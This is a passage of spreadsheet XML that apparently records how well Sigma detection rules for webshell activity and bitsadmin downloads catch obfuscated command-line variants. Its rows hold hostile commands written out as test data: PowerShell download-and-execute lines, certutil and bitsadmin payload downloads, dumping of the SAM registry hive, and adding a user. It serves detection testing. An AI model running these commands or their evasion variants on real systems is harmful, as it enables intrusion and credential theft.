      <c r="A73" s="43" t="n"/>
      <c r="B73" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C73" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D73" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E73" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpRoFiLE -COmmAnD "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F73" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G73" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H73" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73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73" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="43" t="n"/>
      <c r="B74" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C74" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D74" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E74" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -COMmAND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="43" t="n"/>
      <c r="J74" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="43" t="n"/>
      <c r="B75" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C75" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D75" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E75" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRoFIle -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F75" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G75" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75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75" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="43" t="n"/>
      <c r="B76" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C76" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D76" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E76" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noprOFiLe -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F76" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G76" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76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76" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="43" t="n"/>
      <c r="B77" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C77" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D77" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E77" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -coMmaND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="43" t="n"/>
      <c r="J77" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="43" t="n"/>
      <c r="B78" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C78" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D78" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E78" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noProFile -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="43" t="n"/>
      <c r="J78" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="43" t="n"/>
      <c r="B79" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C79" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D79" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E79" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="43" t="n"/>
      <c r="J79" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="43" t="n"/>
      <c r="B80" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C80" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D80" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E80" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F80" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G80" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H80" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I80" s="43" t="n"/>
      <c r="J80" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="43" t="n"/>
      <c r="B81" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C81" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D81" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E81" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F81" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G81" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H81" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81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81" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="43" t="n"/>
      <c r="B82" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C82" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D82" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E82" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F82" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G82" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H82" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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82" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="43" t="n"/>
      <c r="B83" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C83" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D83" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E83" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F83" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G83" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H83" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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83" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="43" t="n"/>
      <c r="B84" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C84" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D84" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E84" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="43" t="n"/>
      <c r="J84" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="43" t="n"/>
      <c r="B85" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C85" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D85" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E85" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F85" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G85" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H85" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="36" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J85" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="43" t="n"/>
      <c r="B86" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C86" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D86" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E86" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F86" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G86" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="36" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J86" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="43" t="n"/>
      <c r="B87" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C87" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D87" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E87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87" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G87" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87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87" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="43" t="n"/>
      <c r="B88" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C88" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D88" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E88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88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="43" t="n"/>
      <c r="J88" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="43" t="n"/>
      <c r="B89" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C89" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D89" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E89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89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="43" t="n"/>
      <c r="J89" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="43" t="n"/>
      <c r="B90" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C90" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D90" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E90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90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="43" t="n"/>
      <c r="J90" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="43" t="n"/>
      <c r="B91" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C91" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D91" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E91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91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="43" t="n"/>
      <c r="J91" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="43" t="n"/>
      <c r="B92" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C92" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D92" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E92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92" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G92" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H92" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I92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92" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="43" t="n"/>
      <c r="B93" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C93" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D93" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E93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93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="43" t="n"/>
      <c r="B94" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C94" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D94" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E94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94" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G94" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H94" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9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94" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="43" t="n"/>
      <c r="B95" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C95" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D95" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E95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95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" hidden="1" ht="15.75" customHeight="1" s="42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</row>
    <row r="97" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="43" t="n"/>
      <c r="B97" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C97" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D97" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E97" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F97" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G97" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H97" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="43" t="n"/>
      <c r="B98" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C98" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D98" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E98" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F98" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G98" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H98" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I98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98" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="43" t="n"/>
      <c r="B99" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C99" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D99" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E99" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F99" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G99" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H99" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I99" s="43" t="n"/>
      <c r="J99" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="100" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="43" t="n"/>
      <c r="B100" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C100" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D100" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E100" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsFER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I100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00" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="43" t="n"/>
      <c r="B101" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C101" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D101" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E101" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I101" s="43" t="n"/>
      <c r="J101" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="102" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="43" t="n"/>
      <c r="B102" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C102" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D102" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E102" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRAnsfER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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02" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="43" t="n"/>
      <c r="B103" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C103" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D103" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E103" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRANSfEr downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F103" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G103" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I103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03" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="43" t="n"/>
      <c r="B104" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C104" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D104" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E104" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F104" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G104" s="36" t="b">
        <v>1</v>
      </c>
